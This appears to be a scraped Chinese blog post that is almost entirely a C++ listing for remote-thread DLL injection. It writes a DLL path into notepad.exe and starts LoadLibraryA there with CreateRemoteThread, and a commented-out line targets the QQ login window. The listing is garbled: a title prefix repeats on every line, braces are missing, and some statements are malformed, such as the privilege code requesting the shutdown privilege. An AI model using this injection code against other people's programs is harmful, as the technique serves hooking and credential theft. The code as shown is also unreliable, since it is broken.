DLL注入的常用方式之一远程线程注入,实现代码如下
CreateRemoteThread注入DLL // CreateRemoteThread.cpp : Defines the entry point for the application.
CreateRemoteThread注入DLL //
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL #include "stdafx.h"
CreateRemoteThread注入DLL #include <stdio.h>
CreateRemoteThread注入DLL #include <tlhelp32.h>
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL #pragma comment(lib,"th32.lib")
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL DWORD GetProcessId()
CreateRemoteThread注入DLL {
CreateRemoteThread注入DLL char* targetFile = "notepad.exe";
CreateRemoteThread注入DLL DWORD Pid=-1;
CreateRemoteThread注入DLL HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
CreateRemoteThread注入DLL PROCESSENTRY32 lPrs;
CreateRemoteThread注入DLL ZeroMemory(&lPrs,sizeof(lPrs));
CreateRemoteThread注入DLL lPrs.dwSize=sizeof(lPrs);
CreateRemoteThread注入DLL Process32First(hSnap,&lPrs);//取得系统快照里第一个进程信息
CreateRemoteThread注入DLL if(strstr(targetFile,lPrs.szExeFile))
CreateRemoteThread注入DLL {
CreateRemoteThread注入DLL Pid=lPrs.th32ProcessID;
CreateRemoteThread注入DLL return Pid;
CreateRemoteThread注入DLL }
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL while(1)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL lPrs.dwSize=(&lPrs,sizeof(lPrs));
CreateRemoteThread注入DLL if(!Process32Next(hSnap,&lPrs))
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL Pid=-1;
CreateRemoteThread注入DLL break;
CreateRemoteThread注入DLL }
CreateRemoteThread注入DLL if(strstr(targetFile,lPrs.szExeFile))
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL return Pid;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL BOOL EnabledDebugPrivilege()
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL HANDLE hToken;
CreateRemoteThread注入DLL TOKEN_PRIVILEGES tkp;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
CreateRemoteThread注入DLL return false;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL tkp.PrivilegeCount = 1;
CreateRemoteThread注入DLL tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL AdjustTokenPrivileges(hToken,false,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL if (GetLastError() != ERROR_SUCCESS)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL return true;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL int APIENTRY WinMain(HINSTANCE hInstance,
CreateRemoteThread注入DLL HINSTANCE hPrevInstance,
CreateRemoteThread注入DLL LPSTR lpCmdLine,
CreateRemoteThread注入DLL int nCmdShow)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL // TODO: Place code here.
CreateRemoteThread注入DLL EnabledDebugPrivilege();
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL char* dllName = "c:\\hook.dll";
CreateRemoteThread注入DLL //HMODULE hDll = LoadLibrary(dllName);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL FARPROC farLoadLibrary = GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA");
CreateRemoteThread注入DLL DWORD dwProcessID = GetProcessId();
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL if(dwProcessID == -1)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"dw not found","",0);
CreateRemoteThread注入DLL return 0;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL //HWND hwNotePad = FindWindow(NULL,"QQ用户登录");
CreateRemoteThread注入DLL //if(hwNotePad == NULL)
CreateRemoteThread注入DLL //return 0;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL //GetWindowThreadProcessId(hwNotePad, &dwProcessID);
CreateRemoteThread注入DLL char* pid = new char[10];
CreateRemoteThread注入DLL sprintf(pid,"0x%x",dwProcessID);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwProcessID);
CreateRemoteThread注入DLL if(hProcess == INVALID_HANDLE_VALUE)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"open error","",0);
CreateRemoteThread注入DLL CloseHandle(hProcess);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL LPVOID lpDllAddr = VirtualAllocEx(hProcess, NULL, strlen(dllName), MEM_COMMIT, PAGE_READWRITE);
CreateRemoteThread注入DLL if(lpDllAddr == NULL)
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"alloc error","",0);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL if(!WriteProcessMemory(hProcess, lpDllAddr, dllName, strlen(dllName) ,NULL))
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL MessageBox(NULL,"Write error","",0);
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL HANDLE hT = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)farLoadLibrary, lpDllAddr, 0, NULL);
CreateRemoteThread注入DLL CloseHandle(hT);
CreateRemoteThread注入DLL CloseHandle(hProcess);
CreateRemoteThread注入DLL MessageBox(NULL,"finish","",0);
CreateRemoteThread注入DLL return 0;
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL
CreateRemoteThread注入DLL